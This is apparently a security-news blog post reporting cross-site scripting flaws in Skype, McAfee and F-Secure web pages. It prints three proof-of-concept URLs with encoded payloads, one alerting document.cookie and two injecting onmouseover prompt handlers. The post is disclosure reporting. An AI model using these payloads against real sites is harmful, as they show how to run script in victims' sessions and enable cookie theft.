Search This Blog

Powered by Blogger.

Blog Archive

Labels

XSS vulnerability found in Skype, FSecure and McaFee websites

After an interesting XSS find in Kevin Mitnick's site, Security Researcher Fabián Cuchietti come with more interesting find.  This time the he discovered xss vulnerability in Skype, Mcafee and Fsecure websites.





The Phorm page of skype is vulnerable to Cross site scripting.
Poc:
http://about.skype.com/press/enquiry/phorm/phorm.php?PHORM_CONFIG=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

McAfee:



https://kc.mcafee.com/corporate/index?page=content&channel=%27%22%20onmouseover=prompt%28090943%29%20bad=%22%20//

F-Secure: 


https://kb.f-secure.com/display/2/loginSecureFrame.aspx?cpid=%22%20onmouseover=prompt%2883893%29%20bad=%22%20//&c=3&cpc=3&cid=3&t=3&aid=3&cat=3&catURL=3&r=0.490020453929901

The XSS Vulnerability discovered on these sites could allow an attacker to steal cookies if he manages to convince the users to click on a specially crafted link.
Share it:

Breaking News

Fabián Cuchietti

Vulnerability

Web Application Vulnerability

XSS Vulnerability